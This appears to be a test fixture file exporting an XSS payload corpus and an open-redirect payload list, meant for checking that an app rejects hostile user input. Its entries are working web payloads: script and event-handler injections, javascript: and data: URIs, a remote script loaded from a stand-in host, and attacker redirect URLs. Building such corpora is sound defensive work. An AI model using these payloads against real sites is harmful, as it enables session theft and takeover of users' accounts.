// XSS payload corpus — every input that renders user content must reject these.
// Sources: OWASP XSS Filter Evasion, HTML5sec.org, PortSwigger.
export const xssPayloads = [
  '<script>alert(1)</script>',
  '<img src=x onerror=alert(1)>',
  '<svg onload=alert(1)>',
  '<iframe src="javascript:alert(1)">',
  '<a href="javascript:alert(1)">click</a>',
  '<body onload=alert(1)>',
  '<details open ontoggle=alert(1)>',
  '<input onfocus=alert(1) autofocus>',
  '<select onfocus=alert(1) autofocus>',
  '<textarea onfocus=alert(1) autofocus>',
  '<video><source onerror=alert(1)>',
  '<marquee onstart=alert(1)>',
  '"><script>alert(1)</script>',
  "'><script>alert(1)</script>",
  '</script><script>alert(1)</script>',
  '<svg><animate onbegin=alert(1) attributeName=x>',
  '<a href="data:text/html,<script>alert(1)</script>">x</a>',
  '<style>@import "javascript:alert(1)"</style>',
  '<link rel=stylesheet href="javascript:alert(1)">',
  '<form><button formaction=javascript:alert(1)>x</button>',
  '<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>',
  'javascript:alert(document.domain)',
  'vbscript:msgbox(1)',
  'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
  '<xmp><script>alert(1)</script></xmp>',
  '<isindex type=submit action=javascript:alert(1)>',
  '"><img src=x onerror=alert(1)>',
  '<TABLE BACKGROUND="javascript:alert(1)">',
  '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1)">',
  '<SCRIPT SRC=http://xss.example/x.js></SCRIPT>',
  '<IMG SRC="javascript:alert(1)">',
  '<IMG SRC=`javascript:alert(1)`>',
  '<INPUT TYPE="IMAGE" SRC="javascript:alert(1)">',
  '<BASE HREF="javascript:alert(1)//">',
  '\u0000\u001F<script>alert(1)</script>',
  // Markdown vectors
  '![x](javascript:alert(1))',
  '[x](javascript:alert(1))',
  '![x](data:text/html,<script>alert(1)</script>)',
  // URL vectors
  '//evil.example/x',
  '\\\\evil.example\\x',
  'file:///etc/passwd',
];

export const openRedirectPayloads = [
  'https://evil.example',
  '//evil.example',
  '\\\\evil.example',
  'javascript:alert(1)',
  'data:text/html,<script>alert(1)</script>',
  '/\\evil.example',
  'https://lumen.app.evil.example',
  'https://evil.example?lumen.app',
];
